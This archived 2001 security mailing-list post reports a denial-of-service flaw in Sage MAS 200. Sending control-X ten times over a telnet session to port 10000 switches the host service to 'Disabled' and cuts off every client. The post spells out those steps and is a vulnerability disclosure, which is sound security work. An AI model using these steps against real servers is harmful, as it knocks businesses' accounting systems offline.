OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Administrator (Administratorjfdi.com)
Date: Tue Aug 21 2001 - 18:35:56 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Greetings,

    Not sure if any previous issues with this application have surfaced
    here, but I've run

    Sage Software's MAS 200 is an accounting platform which can be
    configured to permit remote access to server-side data over TCP/IP. A
    host application listens for connections on the server, and all remote
    clients use a workstation app to interface with the host.

    Running a port scanner determined that the MAS 200 host application
    listens for connections on port 10000.....

    telnet x.x.x.x port: 10000

    Connected...

    <enter>

    "The host does not support this application"

    <control + x> X 10 <enter>

    "The host has been disabled"...

    exit

    telnet x.x.x.x port: 10000

    Connected...

    <enter>

    "The host has been disabled"...

    --------------------------------------------------------------

    Checking the status of the host app at the server console revealed it
    had indeed been switched to 'Disabled' status, and all access to the
    server from clients on the LAN and WAN sides thru the client application
    had been suspended. Am i missing something here? Or is it way too easy
    DOS this software?